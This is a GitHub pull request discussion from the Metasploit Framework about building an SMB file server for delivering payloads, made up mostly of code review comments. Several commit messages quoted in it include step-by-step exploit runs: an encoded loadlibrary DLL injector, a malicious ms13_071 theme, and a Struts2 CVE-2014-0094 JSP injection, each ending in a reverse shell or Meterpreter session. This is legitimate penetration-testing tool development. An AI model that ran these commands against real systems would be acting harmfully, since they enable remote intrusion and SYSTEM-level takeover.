Implement SMB Server Protocol within Rex #3074

Merged
merged 1 commit into from

7 participants

@0x41414141

This commit adds support for implementing the SMBFileServer Module
within Rex, allowing exploit modules to create a payload to be sent
to an SMBFileServer instance. This can be useful in cases where
you would find DLL injection in a system which will read files
over a UNC share, or other instances where a payload can be delivered
over SMB.

This code borrows heavily from the ms13_071_theme module written
by Juan Vazquez, however I have performed a fair amount of protocol
analysis and debugging to provide support for delivering an arbitrary
MSF payload over UNC.
The main differences being the presence of functions to support:

  • SMB CMD Trans Query Path Info (Basic and Standard)
  • SMB CMD Trans Query File Info (Standard and Internal)

This code can be considered "alpha", as I have only implemented support
for the SMB functions discovered during development of an exploit of an
arbitrary DLL injection into a server performing a "LoadLibraryA" call.*
However, this provides a basis upon which additional SMB functions can
be implemented to extend delivery of payloads over SMB.

A separate commit will expose the SMBFileServer Module within
./lib/msf/core/exploit/smb.rb

* This exploit will be committed separately once a fix has been confirmed by the vendor.

@wchen-r7
Collaborator

ccing @jlee-r7 because he's been working on smb.

@Meatballs1
Collaborator

Awesome #2753 could definitely benefit from this :)

@Meatballs1 Meatballs1 referenced this pull request
Closed

Nvidia Mental Ray Service Exploit #3079

2 of 4 tasks complete
@jlee-r7
Collaborator

No tests, almost no docs, bad commit message. Please read CONTRIBUTING.md

lib/rex/proto/smb/server.rb
((5 lines not shown))
+require 'rex/logging'
+require 'rex/struct2'
+require 'rex/proto/smb/constants'
+require 'rex/proto/smb/utils'
+require 'rex/proto/dcerpc'
+
+module Rex
+module Proto
+module SMB
+
+###
+#
+# Runtime extension of the SMB clients that connect to the server.
+#
+###
+module ServerClient
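Review bot: the comment above `module ServerClient` says it is a runtime extension of connecting clients, but not which object it is mixed into or what state it adds to each connection. Spell that out in the comment block, since the rest of the file depends on it. The `require` lines visible here are also worth checking against what this file actually references, so that only the needed ones remain.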
@jlee-r7 Collaborator
jlee-r7 added a note

Belongs in its own file

lib/rex/proto/smb/server.rb
((71 lines not shown))
+ def initialize(port, listen_host, context = {})
+ self.listen_host = listen_host
+ self.listen_port = port
+ self.context = context
+ self.listener = nil
+ self.multiplex_id = rand(0xffff)
+ self.process_id = rand(0xffff)
+ @state = {}
+ end
+
+ #
+ # Debug
+ #
+ def dprint(msg)
+ return if not self.debugging
+ $stdout.puts "#{msg}"
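Review bot: `initialize` stores `multiplex_id`, `process_id` and `@state` on the same object that holds `listen_host` and `listen_port`, so every connection this listener accepts would share one set of values. Keep per-connection values in a structure keyed by client instead. In `dprint`, `"#{msg}"` is only `msg.to_s`, and `return if not self.debugging` reads better as `return unless debugging`; the `# Debug` comment should say what enables the output.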
@jlee-r7 Collaborator
jlee-r7 added a note

Never print to $stdout or $stderr. Use the logging methods elog, and dlog.

@0x41414141

Thanks for the feedback @jlee-r7. I've tidied up server.rb and smb.rb following your guidance.

Tested on: Windows 7 x86/x86_64

Example Output:
As this is a proto implementation, the only visible output is from exploit modules which use it. Screenshot of the module in use:
verbose

Example SMB Capture:
Negotiate Protocol Request
Negotiate Protocol Response
Session Setup AndX Request, User: anonymous; Tree Connect AndX, Path: \\10.0.140.1\IPC$
Session Setup AndX Response; Tree Connect AndX
Session Setup AndX Request, User: anonymous; Tree Connect AndX, Path: \\10.0.140.1\FHHJR
Session Setup AndX Response; Tree Connect AndX
Trans2 Request, QUERY_PATH_INFO, Query File Basic Info, Path: \WrxgapC.DLL
Trans2 Response, QUERY_PATH_INFO
Trans2 Request, QUERY_PATH_INFO, Query File Standard Info, Path: \WrxgapC.DLL
Trans2 Response, QUERY_PATH_INFO
NT Create AndX Request, FID: 0x7670, Path: \WrxgapC.DLL
NT Create AndX Response, FID: 0x7670
Trans2 Request, QUERY_FILE_INFO, FID: 0x7670, Query File Standard Info
Trans2 Response, FID: 0x7670, QUERY_FILE_INFO
Trans2 Request, QUERY_FILE_INFO, FID: 0x7670, Query File Standard Info
Trans2 Response, FID: 0x7670, QUERY_FILE_INFO
Trans2 Request, QUERY_FILE_INFO, FID: 0x7670, Query File Standard Info
Trans2 Response, FID: 0x7670, QUERY_FILE_INFO
Read AndX Request, FID: 0x7670, 4096 bytes at offset 0
Read AndX Response, FID: 0x7670, 4096 bytes
Read AndX Request, FID: 0x7670, 512 bytes at offset 13312
Read AndX Response, FID: 0x7670, 512 bytes
Read AndX Request, FID: 0x7670, 1024 bytes at offset 12288
Read AndX Response, FID: 0x7670, 1024 bytes
Read AndX Request, FID: 0x7670, 1536 bytes at offset 1024
Read AndX Response, FID: 0x7670, 1536 bytes
Read AndX Request, FID: 0x7670, 8704 bytes at offset 2560
Read AndX Response, FID: 0x7670, 8704 bytes
Read AndX Request, FID: 0x7670, 512 bytes at offset 11264
Read AndX Response, FID: 0x7670, 512 bytes
Read AndX Request, FID: 0x7670, 512 bytes at offset 11776
Read AndX Response, FID: 0x7670, 512 bytes

As a fair amount of the SMB code was borrowed from the ms13_071_theme module by @jvazquez-r7, I've not got any rspec tests. I'll look at getting a Yard doc put together for the smb.rb (start_smb_server) function however.

One question: when using dlog/elog, where does the log output go? I get nothing appearing in framework.log with DEBUG set.

@jlee-r7
Collaborator

elog and dlog output goes to framework.log but depends on the LogLevel datastore option. Set that to 5 and you should see everything start showing up in the log.

We really can't possibly accept this without tests.

@0x41414141

Thanks @jlee-r7. I've tried LogLevel 5 but it didn't seem to do anything. Will look into this further.

Re: tests, I'm happy to do as much as is required to get this past review, but could use some help. As I say, this was pretty heavily borrowed and extended work by @jvazquez-r7 which was already committed so didn't see much issue. I designed this module to be completely separate to existing modules (such as SMBServer) so it didn't interfere with any existing exploit modules or the framework as a whole (which is why all but one move of an end statement it's pure code addition).
I'll give rspec a bit of a read, but could use a few pointers on what sort of testing is required. Multi platform tests or just compilation/runtime things?

@0x41414141 0x41414141 referenced this pull request from a commit in 0x41414141/metasploit-framework
@0x41414141 0x41414141 Add SMB DLL Injection Server
This is an implementation of using the SMBFileServer mixin to perform
DLL injection over SMB.

Exploitation can be performed by starting the dllinjector exploit
which will remain resident until a DLL is downloaded and a session
created. By generating an executable using the windows/loadlibrary
payload it is possible to test the SMBServer mixin on various platforms,
but also serves as a novel injection method where LoadLibrary calls are
not being filtered by Antivirus or EMET.

Example Run
```
 # msfcli exploits/windows/smb/dllinjector PAYLOAD=windows/meterpreter/reverse_tcp SHARE=share DLL=exploit.dll LHOST=172.32.255.1 LPORT=4444 SRVHOST=172.32.255.1 E
 [*] Initializing modules...
 PAYLOAD => windows/meterpreter/reverse_tcp
 SHARE => share
 DLL => exploit.dll
 LHOST => 172.32.255.1
 LPORT => 4444
 SRVHOST => 172.32.255.1
 [*] Started reverse handler on 172.32.255.1:4444
 [*] Generating our malicious dll...
 [*] Starting SMB Server on: \\172.32.255.1\share\exploit.dll
 [*] Sending stage (769536 bytes) to 172.32.255.128
 [*] Meterpreter session 1 opened (172.32.255.1:4444 -> 172.32.255.128:1186) at 2014-04-24 11:18:55 +0100
 meterpreter > getsystem
 ...got system (via technique 1).
 meterpreter > getuid
 Server username: NT AUTHORITY\SYSTEM
```

Reproduction Steps
* Generate dllinjector executable (non-malicious)
```
msfpayload windows/loadlibrary DLL="\\\\1.2.3.4\\share\\exploit.dll" R | msfencode -b '\x00' -t exe -x calc.exe -k -o dllinjector.exe -e x86/shikata_ga_nai -c 3
```
* Run DLL Injection server
```
msfcli exploits/windows/smb/dllinjector PAYLOAD=windows/meterpreter/reverse_tcp LHOST=1.2.3.4 LPORT=4444 SRVHOST=1.2.3.4 SHARE=share DLL=exploit.dll E
```
* Execute dllinjector.exe on the target host
* Monitor the generated traffic in Wireshark
* Enjoy shells.

Verification
Land #3074
Land #3075
Generate loadlibrary executable
Load dllinjector with payload
Run executable on target

Tested on:
Windows 7 (x86/x64)
Windows Server 2003
Windows Server 2008
a549296
@0x41414141 0x41414141 referenced this pull request
Merged

Add SMB DLL Injection Server #3294

0 of 5 tasks complete
@0x41414141

I have implemented an SMB DLL injection server in #3294 which can be used in combination with the loadlibrary payload to test this module.
As such, this has been successfully tested on Windows 7 x86 & x64, Windows Server 2003 and Windows Server 2008.

@0x41414141 0x41414141 referenced this pull request from a commit in 0x41414141/metasploit-framework
@0x41414141 0x41414141 Refactor ms13_071_theme to utilise `Msf::Exploit::Remote::SMBFileServer`
This commit refactors the ms13_071_theme module written by @jvazquez-r7
to utilise the Rex SMBFileServer protocol and remove duplicate code from
Metasploit.

```
[*] Processing test3.msf for ERB directives.
resource (test3.msf)> use exploits/windows/fileformat/ms13_071_theme
resource (test3.msf)> set VERBOSE true
VERBOSE => true
resource (test3.msf)> set SHARE share
SHARE => share
resource (test3.msf)> set SCR exploit.scr
SCR => exploit.scr
resource (test3.msf)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (test3.msf)> set LHOST 172.32.255.1
LHOST => 172.32.255.1
resource (test3.msf)> set SRVHOST 172.32.255.1
SRVHOST => 172.32.255.1
resource (test3.msf)> set LPORT 4444
LPORT => 4444
resource (test3.msf)> exploit
[*] Started reverse handler on 172.32.255.1:4444
[*] Generating our malicious executable...
[*] Creating 'msf.theme' file ...
[+] msf.theme stored at /root/.msf4/local/msf.theme
[+] Let your victim open msf.theme
[*] Starting SMB Server on: \\172.32.255.1\share\exploit.scr
[*] Starting SMB Server on 172.32.255.1:445
[*] Sending stage (769536 bytes) to 172.32.255.129
[*] Meterpreter session 1 opened (172.32.255.1:4444 -> 172.32.255.129:1096) at 2014-04-30 12:05:46 +0100

meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```

1. use exploits/windows/fileformat/ms13_071_theme
2. set payload windows/meterpreter/reverse_tcp
3. set LHOST
4. set SRVHOST
5. exploit
6. Copy msf.theme to target
7. Open theme and navigate to "Screensaver" tab
8. Enjoy shells

- [ ] Land #3074
- [ ] Land #3075
- [ ] Run exploits/windows/fileformat/ms13_071_theme
- [ ] Let target open malicious msf.theme file

* Windows XP SP3
f72d54b
lib/rex/proto/smb/server.rb
((113 lines not shown))
+ #
+ ##
+ def register(unc, contents, exe_file, hi, lo)
+ @unc = unc
+ @exe_file = exe_file
+ @hi = hi
+ @lo = lo
+ @exe = contents
+ @flags2 = 0xc807 # e807 or c807 or c001
+ end
+
+protected
+
+ # Converts bin to hex
+ def bin_to_hex(s)
+ s.unpack('H*').first
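Review bot: `@flags2 = 0xc807 # e807 or c807 or c001` leaves a magic value with three candidate settings and no statement of which bits matter or when each applies. Build it from named flag constants and document the choice. `register` also gives no description of `hi` and `lo`, stores `contents` as `@exe` next to a separate `@exe_file`, and overwrites one set of instance variables, so a second call replaces the first file.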
@Meatballs1 Collaborator

Check Rex::Text to see if there is an existing function that can be used for these two functions

@Meatballs1
Collaborator

I would look at an existing Rex spec to see the level of testing required. Ideally it should exercise all of the functions at least once.

Writing a full suite of tests for SMB would be a massive undertaking... I guess some mocking of the 'client' needs to be done.

@0x41414141 0x41414141 referenced this pull request from a commit in 0x41414141/metasploit-framework
@0x41414141 0x41414141 Add CVE-2014-0094 RCE for Struts2 using JSP injection over SMB
This commit adds an exploit for the Struts2 RCE utilising the Rex
SMBFileServer Protocol support to deploy a JSP shell over SMB.

```
resource (test4.msf)> use exploits/windows/http/struts_http_jspinject
resource (test4.msf)> set VERBOSE true
VERBOSE => true
resource (test4.msf)> set PAYLOAD java/jsp_shell_reverse_tcp
PAYLOAD => java/jsp_shell_reverse_tcp
resource (test4.msf)> set URI /struts2-blank/example/HelloWorld.action
URI => /struts2-blank/example/HelloWorld.action
resource (test4.msf)> set SHARE share
SHARE => share
resource (test4.msf)> set JSP /example/HelloWorld.jsp
JSP => /example/HelloWorld.jsp
resource (test4.msf)> set SRVHOST 172.31.6.41
SRVHOST => 172.31.6.41
resource (test4.msf)> set RHOST 172.31.6.245
RHOST => 172.31.6.245
resource (test4.msf)> set RPORT 8080
RPORT => 8080
resource (test4.msf)> set LHOST 172.31.6.41
LHOST => 172.31.6.41
resource (test4.msf)> set LPORT 4444
LPORT => 4444
resource (test4.msf)> exploit
[*] Started reverse handler on 172.31.6.41:4444
[*] Generating our malicious jsp...
[*] About to start SMB Server on: \\172.31.6.41\share for
/example/HelloWorld.jsp
[*] Starting SMB Server on 172.31.6.41:445
[*] Injecting JSP to 172.31.6.245:8080 -
/struts2-blank/example/HelloWorld.action?Class.classLoader.resources.dirContext.docBase=//172.31.6.41/share
[*] 172.31.6.245:8080 - JSP payload uploaded successfully
[*] Command shell session 1 opened (172.31.6.41:4444 ->
172.31.6.245:1146) at 2014-05-01 12:09:25 +0100

Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\Program Files\Apache Software Foundation\apache-tomcat-7.0.53\bin>
```

1. Install Tomcat 7.0.53
2. Download and unpack Struts 2.3.16.1 (http://www.mirrorservice.org/sites/ftp.apache.org//struts/binaries/struts-2.3.16.1-all.zip)
3. Deploy struts-2.3.16.1/apps/struts2-blank.war through Tomcat Manager interface
4. use exploits/windows/http/struts_http_jspinject
5. set PAYLOAD java/jsp_shell_reverse_tcp
6. set URI /struts2-blank/example/HelloWorld.action
7. set SHARE share
8. set JSP /example/HelloWorld.jsp
9. set SRVHOST
10. set RHOST
11. set RPORT 8080
12. set LHOST
13. set LPORT 4444
14. exploit
15. Enjoy shells

- [ ] Land #3074
- [ ] Land #3075
- [ ] Run exploits/windows/http/struts_http_jspinject

Tomcat 7.0.53 & Struts 2.3.16.1
187e7e4
@0x41414141

@Meatballs1 Thanks - I've found the relevant Rex::Text function and removed that. Do you know of any existing Rex specs I can look at to flex the functions? Other than my 4 test cases (exploits) I've not found any other ways of flexing the SMB functions :-)

@Meatballs1
Collaborator

There doesn't appear to be any real specs for Rex server side stuff:

spec/lib/msf/core/exploit/http/server_spec.rb is probably the closest example you will get which mocks some stuff up

spec/lib/rex/proto/http/client_spec.rb has some stubbing.

I'm not really much of a ruby developer so more complicated unit tests with mocking and stubbing are mostly beyond me!

@todb-r7 todb-r7 added the library label
@hmoore-r7
Owner

Working on a review, there are no smb_server specs, but samba does include a torture test suite. Landing a server implementation seems fine to me since nothing calls it yet. I do have a few nitpicks, but will back to @0x41414141's branch after review/edits.

@hmoore-r7
Owner

I don't believe copying spec/lib/msf/core/exploit/http/server_spec.rb is appropriate until there is a Msf mixin associated with the Rex class. The existing spec covers the use of a mixin within a temporary module class, where this is just the Rex protocol specification.

@hmoore-r7
Owner

There are design issues with this server implementation:

  • All client connections are treated as the same through instance variables
  • It differs significantly from existing file server APIs (resource dispatch, etc)
  • AndX secondary commands are being assumed whether they exist or not
  • Technically we already have a smb_server mixin to base this on
  • Lots of hardcoded values need to be configurable

Working through them now, but this will require a rework of the dependent PRs as well.
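
The AndX point in the list above, as an added example that is not code from the pull request or from any participant: a parser that walks an SMB1 AndX chain and reports only the commands really present, rejecting offsets that point outside the message. The sample messages are constructed, and `andx_chain`, `MalformedSMB`, `smb_header` and `andx_block` are hypothetical names.

```ruby
# Added illustration, not code from the pull request. Walks the AndX chain of
# one SMB1 request so handlers act only on commands that are really present.

SMB_HEADER_LEN = 32
NO_ANDX = 0xFF # AndXCommand value meaning "no further command follows"
ANDX_COMMANDS = {
  0x24 => 'LOCKING_ANDX', 0x2D => 'OPEN_ANDX', 0x2E => 'READ_ANDX',
  0x2F => 'WRITE_ANDX', 0x73 => 'SESSION_SETUP_ANDX', 0x74 => 'LOGOFF_ANDX',
  0x75 => 'TREE_CONNECT_ANDX', 0xA2 => 'NT_CREATE_ANDX'
}.freeze

class MalformedSMB < StandardError; end

# msg: one SMB1 request without the 4-byte NetBIOS session header.
# Returns the command codes present in the message, in chain order.
def andx_chain(msg)
  msg = msg.b
  raise MalformedSMB, 'short message' if msg.bytesize < SMB_HEADER_LEN + 3
  raise MalformedSMB, 'bad protocol id' unless msg.byteslice(0, 4) == "\xFFSMB".b

  command = msg.getbyte(4)
  offset = SMB_HEADER_LEN # first parameter block follows the fixed header
  chain = []
  loop do
    chain << command
    break unless ANDX_COMMANDS.key?(command)

    # Block layout: WordCount, words (AndXCommand, reserved, AndXOffset, ...),
    # ByteCount, bytes.
    word_count = msg.getbyte(offset)
    words_end = offset + 1 + 2 * word_count
    raise MalformedSMB, 'AndX block lacks AndX words' if word_count < 2
    raise MalformedSMB, 'truncated parameter words' if words_end + 2 > msg.bytesize

    byte_count = msg.byteslice(words_end, 2).unpack1('v')
    block_end = words_end + 2 + byte_count
    raise MalformedSMB, 'truncated data bytes' if block_end > msg.bytesize

    next_command = msg.getbyte(offset + 1)
    next_offset = msg.byteslice(offset + 3, 2).unpack1('v')
    break if next_command == NO_ANDX

    # The next block must start at or after the end of this one (so the walk
    # cannot loop) and leave room for its own WordCount and ByteCount.
    if next_offset < block_end || next_offset + 3 > msg.bytesize
      raise MalformedSMB, format('AndXOffset %d outside message', next_offset)
    end

    command = next_command
    offset = next_offset
  end
  chain
end

# --- constructed sample messages (not captured traffic) ---
def smb_header(command)
  "\xFFSMB".b + [command].pack('C') + ("\x00".b * 27)
end

def andx_block(next_command, next_offset, bytes: ''.b)
  words = [next_command, 0, next_offset].pack('CCv')
  [words.bytesize / 2].pack('C') + words + [bytes.bytesize].pack('v') + bytes
end

# Session Setup AndX on its own: no secondary command.
SINGLE = smb_header(0x73) + andx_block(NO_ANDX, 0)
# Session Setup AndX chained to Tree Connect AndX at offset 39 (32 + 7).
CHAINED = smb_header(0x73) + andx_block(0x75, 39) + andx_block(NO_ANDX, 0)
# Claims a Tree Connect AndX at offset 200, but the message ends at 39.
DANGLING = smb_header(0x73) + andx_block(0x75, 200)
# AndXOffset points back at the first block.
LOOPING = smb_header(0x73) + andx_block(0x73, 32)

if $PROGRAM_NAME == __FILE__
  [SINGLE, CHAINED, DANGLING, LOOPING].each do |m|
    begin
      names = andx_chain(m).map { |c| ANDX_COMMANDS.fetch(c, format('0x%02X', c)) }
      puts names.join(' -> ')
    rescue MalformedSMB => e
      puts "rejected: #{e.message}"
    end
  end
end
```

A handler that always processes a Tree Connect after Session Setup would misread `SINGLE` and read past the end of `DANGLING`; dispatching on the returned chain avoids both.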

@hmoore-r7
Owner

Heads up that I am still working on this, but it will take at least the next week to get a reworked copy back into your branch. There is a lot of work to do in order to make the implementation multiclient friendly and work for other use cases besides just serving a static file.

@hmoore-r7 hmoore-r7 added the delayed label
@0x41414141

Cool. I have several test cases of real world exploits that I have implemented using this. Just totally lost in the Rspec world so haven't made much progress. The code needs some refactoring anyway to localise file names and be more multi client friendly. I'll work on that after your next branch update.

@todb-r7 todb-r7 added the feature label
@0x41414141 0x41414141 referenced this pull request
Merged

CVE 2014-2623 - HP Data Protector 8.10 RCE #4451

0 of 3 tasks complete
@0x41414141

@hmoore-r7 I'm back on this after a break. I'll take into account your suggestions as I work on it. To break out multiple client connections (assuming multiple payloads as well) will require a big refactor. I can cover more AndX functions as I encounter them - so far the 5 or so different exploitation scenarios I've seen only call a few different code paths, so it may not be a full SMB implementation but works for exploit delivery as far as I have seen.
Which hardcoded values need to be configurable? I've done some refactoring today which has made it better but can expose as much to msf from Rex as required. Thanks.

@jvazquez-r7 jvazquez-r7 self-assigned this
@jvazquez-r7
Collaborator

I'm gonna try to work and hopefully land these SMB related PR. It will take me some time... just pointing I start to work on it!

@jvazquez-r7
Collaborator

Easy test retrieving a file with #3074 and #3075:

  • From windows machines:
>type \\172.16.158.1\test\test.txt
ABCDE
  • The dummy smb code:
    my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
    share = 'test'
    test_file = 'test.txt'
    unc = "\\\\#{my_host}\\#{share}\\#{test_file}"
    contents = 'ABCDE'

    print_status("Starting SMB Server on: #{unc}")

    start_smb_server(unc, contents, test_file)
    while true
      sleep(1)
    end
  • Test results

Windows 2003 SP2: Ok

Windows XP SP3: Ok

Windows 2008 R2: Ok

Windows 7 SP1: Warning I need two "types" to access the contents:

C:\Users\Administrator>type \\172.16.158.1\test\test.txt
The system cannot find the file specified.

C:\Users\Administrator>type \\172.16.158.1\test\test.txt
ABCDE
C:\Users\Administrator>

Windows 2012: Warning I need two "types" to access the contents:

C:\Users\Administrator>type \\172.16.158.1\test\test.txt
The system cannot find the file specified.

C:\Users\Administrator>type \\172.16.158.1\test\test.txt
ABCDE

Windows 8.1: Warning I need two "types" to access the contents:

C:\Users\Administrator>type \\172.16.158.1\test\test.txt
The system cannot find the file specified.

C:\Users\Administrator>type \\172.16.158.1\test\test.txt
ABCDE

@0x41414141 if you are following this PR still, do you mind to verify if you can reproduce my results? The expected result is getting the file contents on the first type always. Otherwise looks like some code should be improved.

Additional note: On the tests, all the Windows machines are on domains, not workgroups.

@0x41414141

@jvazquez-r7 yes I'm still following this. I'll reproduce and get a fix for doing type asap. It's not something I've tried in my tests so likely just a function missing. Will also try between a domain joined and non-domain joined machine. Thanks.

@jvazquez-r7 jvazquez-r7 referenced this pull request in 0x41414141/metasploit-framework
Closed

Update Branch #1

@jvazquez-r7
Collaborator

@0x41414141 thanks, I'm working on that too, so hopefully soon we'll be able to land all this work!

See 0x41414141#1, do you mind to land it? merges #3075 and updates your working branch. So it's easier to work with the framework changes. Once landed this pull request will be automatically updated and I'll close #3075 manually so we can just keep working on this one! Thanks!

@0x41414141

@jvazquez-r7 excellent. Yes, I'll review and land your changes in my branch tomorrow and hopefully we can land this. Thanks for all your help!

@jvazquez-r7
Collaborator

Yup, will take several days, but I'm working on it! I hope we'll be able to make this happen.

That PR just updates with master changes and merges #3074 and #3075. It's a first step! I'll be helping with code cleaning, doc, specs etc, whatever is needed.

My first stopper at that moment is the "The system cannot find the file specified" on some OS's. I'm verifying if the handling which the Rex code is doing for QUERY_PATH_INFO standard requests is good enough or needs more thinking... I think the error messages could be related to these requests handling, but just a first feeling.... I'm going comfortable with your code still!

And yeah, no rush, feel free to review my PR when you have time.

@jvazquez-r7
Collaborator

Also, pointing which FIND_FIRST2 requests handling looks incomplete, it's assuming "Level of Interest" as "Find File Both Directory Info" always I'd say. The code should extract that information from the REQUEST, and answer correctly if necessary, otherwise send an error.
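
The FIND_FIRST2 point above, as an added example that is not code from the pull request or from any participant: read the information level out of the TRANS2 request and answer only the levels that are implemented, returning an error status for the rest. The request is constructed, the function names are hypothetical, and the use of STATUS_NOT_SUPPORTED for unknown levels is this example's assumption.

```ruby
# Added illustration, not code from the pull request. Extracts the
# "Level of Interest" from a TRANS2 FIND_FIRST2 request instead of assuming it.

TRANS2 = 0x32
FIND_FIRST2 = 0x0001                    # Trans2 subcommand carried in Setup[0]
FIND_FILE_BOTH_DIRECTORY_INFO = 0x0104  # the only level this sketch answers
SUPPORTED_FIND_LEVELS = [FIND_FILE_BOTH_DIRECTORY_INFO].freeze
STATUS_SUCCESS = 0
STATUS_NOT_SUPPORTED = 0xC00000BB       # error choice is an assumption here

class BadTrans2 < StandardError; end

# msg: one SMB1 message without the 4-byte NetBIOS session header.
# Returns the InformationLevel field of a FIND_FIRST2 request.
def find_first2_level(msg)
  msg = msg.b
  unless msg.bytesize > 33 && msg.byteslice(0, 4) == "\xFFSMB".b && msg.getbyte(4) == TRANS2
    raise BadTrans2, 'not a TRANS2 request'
  end

  # 14 fixed parameter words plus at least one setup word.
  word_count = msg.getbyte(32)
  words = msg.byteslice(33, 2 * word_count)
  raise BadTrans2, 'truncated parameter words' if word_count < 15 || words.bytesize < 2 * word_count

  param_count, param_offset = words.byteslice(18, 4).unpack('vv')
  raise BadTrans2, 'no setup word' if words.getbyte(26) < 1
  raise BadTrans2, 'not FIND_FIRST2' unless words.byteslice(28, 2).unpack1('v') == FIND_FIRST2

  # ParameterOffset counts from the start of the SMB header. The fixed part of
  # the FIND_FIRST2 parameters is 12 bytes, with InformationLevel at byte 6.
  data_start = 33 + 2 * word_count + 2
  if param_count < 12 || param_offset < data_start || param_offset + param_count > msg.bytesize
    raise BadTrans2, 'parameters out of bounds'
  end
  msg.byteslice(param_offset + 6, 2).unpack1('v')
end

# Decide how to answer: build a listing only for implemented levels.
def find_first2_decision(msg)
  level = find_first2_level(msg)
  status = SUPPORTED_FIND_LEVELS.include?(level) ? STATUS_SUCCESS : STATUS_NOT_SUPPORTED
  { level: level, status: status }
end

# --- constructed request (not captured traffic), no padding before parameters ---
def build_find_first2(level, pattern)
  # SearchAttributes, SearchCount, Flags, InformationLevel, SearchStorageType, FileName
  params = [0x0016, 1, 0, level, 0].pack('vvvvV') + pattern.encode('UTF-16LE').b + "\x00\x00".b
  param_offset = 32 + 1 + 30 + 2 # header + WordCount + 15 words + ByteCount
  words = [params.bytesize, 0, 10, 0x4000, 0, 0, 0, 0, 0,
           params.bytesize, param_offset, 0, 0, 1, 0, FIND_FIRST2].pack('vvvvCCvVvvvvvCCv')
  "\xFFSMB".b + [TRANS2].pack('C') + ("\x00".b * 27) +
    [words.bytesize / 2].pack('C') + words + [params.bytesize].pack('v') + params
end

if $PROGRAM_NAME == __FILE__
  [0x0104, 0x0101].each do |level|
    d = find_first2_decision(build_find_first2(level, '\\*'))
    puts format('level 0x%04X -> status 0x%08X', d[:level], d[:status])
  end
end
```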

@jvazquez-r7
Collaborator

Some general recommendations for library/core code:

  • Making assumptions is normally not a good idea.
  • Classes need enough YARD documentation: http://yardoc.org/
  • The lib code should be spec'd: the specs coming with this pull request definitely look weak for too much code. Just a size observation but I'm pretty sure they are not good enough to ensure a minimum of code correctness.
  • Using "magic" values are generally a bad idea. Constant must be defined and documented.
  • As a general note, on library code is a good idea to follow the ruby style guide: https://github.com/bbatsov/ruby-style-guide

That said, my first feeling is here are a lot of things to do. I'll try to help as much as possible, but definitely we need work here to make it landable!

@jvazquez-r7
Collaborator

As @hmoore-r7 pointed: Technically we already have a smb_server mixin to base this on. I would add, all the implementation has been added to the Rex code, and the mixin is just a small wrapper to create and start a server instance.

In this way it's hard for modules to redefine any behavior from the file server, something which could be desired for some exploits (for example an exploit which could need to send a malicious answer while a SMB file transaction).

Just, another thing to have into account, but yup, we can start by trying to polish, fix current code, and then we do some redesign if necessary.

@jvazquez-r7 jvazquez-r7 referenced this pull request
Merged

Reorganize SMB mixins #4768

3 of 3 tasks complete
@jvazquez-r7
Collaborator

The more I read this code, the more sense has for me to move several (a lot probably) code from Rex to a mixin. While trying to make some experiments, noticed which the SMB mixins are a little bit unorganized on framework. I've tried to make a better structure here: #4768.

@0x41414141 until I get feedback on #4768 I'm going to close 0x41414141#1 because I also noticed this branch was super out of date. (On master SMBServer mixin was moved to smb_server.rb for example :(). I'm going to try to get 0x41414141#1 and then update this pull request!

@0x41414141

@jvazquez-r7 Can you check your "type" tests with the following patch (0x41414141@3110c7b); a separate function needed to be implemented for newer O/S's, so this should work first time now.

The code needs a clean up - as there's several duplicated functions I'm re-implementing as I see new SMB calls (having the samba source code is helping btw). I may look at a large refactor and commit some constants to move some of the "magic" values around.

Are there any commits you want me to merge? And should I combine #3074 and #3075 into a single commit?

@0x41414141

@jvazquez-r7 Also see 0x41414141@1f6aebe which works in some additional constants and removes some of the magic values from server.rb. Might go hand in hand with your work on reorganising the smb modules.

@jvazquez-r7
Collaborator

@0x41414141 thanks for the quick update!! We also got #4784 landed which is trying a more clear organization for the SMB mixins.

Tomorrow I'll test your changes on my test environments and update results. Also, will merge #3075 on this branch and update it with master changes! So hopefully tomorrow we'll have a branch updated with both rex and mixin code. I'll do PR back to you for your review and landing.

If that code works on all the testing environments, then I'll be doing my best to help with cleanup in the next days, and hopefully soon it will be able to be landed! :-D Really thanks for your fast answer and keep working on it over the months! It's really appreciated! Hopefully we'll make it happen!

@jvazquez-r7
Collaborator

yay! Initial test passed Windows XP SP3, Windows 2003 SP2, Windows 8.1, Windows 2012, Windows 2008 R2 and Windows 7 SP1! Coolio.

I'm now merging #3075 here and updating with master changes including the recent smb changes! I'll have a pull request back to you hopefully today to update this branch! And then I'll be helping with code cleanup, yard, specs and whatever is needed to hopefully have it landed!

Once we've rex/mixin support we'll focus on the modules PR's. Please let me just focus on the rex/mixin code at the moment :) We can take care of all the awesome modules using SMBFileServer later :)

@todb-r7 todb-r7 added tests and removed delayed labels
@jvazquez-r7 jvazquez-r7 referenced this pull request from a commit in jvazquez-r7/metasploit-framework
@jvazquez-r7 jvazquez-r7 Merge #3074, @0x41414141 SMBFileServer mixin 01bedb7
@jvazquez-r7 jvazquez-r7 referenced this pull request in 0x41414141/metasploit-framework
Merged

Move code from Rex to mixin #2

@jvazquez-r7
Collaborator

@0x41414141 please see 0x41414141#2 (the description explains the changes!). Please feel free to review, test, discuss and once ready feel free to land so we can go ahead!! Once that pull request is landed we'll have a first starting point to clean, spec, document, etc. I'll be helping with these steps too. But I'd like you to review and agree with 0x41414141#2 first, thanks!!

@jvazquez-r7
Collaborator

Thanks for landing @0x41414141 ! I'm going to close #3075 so we can keep working on the mixin here! Once we're able to land this pull request, we'll be ready to work with the module! I'll also help there! More coming here!

@0x41414141 0x41414141 referenced this pull request from a commit in 0x41414141/metasploit-framework
@0x41414141 0x41414141 Modify SMB generation code to use primer based on #3074 changes to
implement Msf::Exploit::Remote::SMB::Server::Share as a mixin.
1751921
@0x41414141 0x41414141 referenced this pull request from a commit in 0x41414141/metasploit-framework
@0x41414141 0x41414141 Modify SMB generation code to use primer based on #3074 changes to
implement Msf::Exploit::Remote::SMB::Server::Share as a mixin.
14b2388
@0x41414141 0x41414141 referenced this pull request from a commit in 0x41414141/metasploit-framework
@0x41414141 0x41414141 Modify SMB generation code to use primer based on #3074 changes to
implement Msf::Exploit::Remote::SMB::Server::Share as a mixin.
34f4ae7
@0x41414141 0x41414141 referenced this pull request from a commit in 0x41414141/metasploit-framework
@0x41414141 0x41414141 Modify SMB generation code to use primer based on #3074 changes to
implement Msf::Exploit::Remote::SMB::Server::Share as a mixin.
9aef561
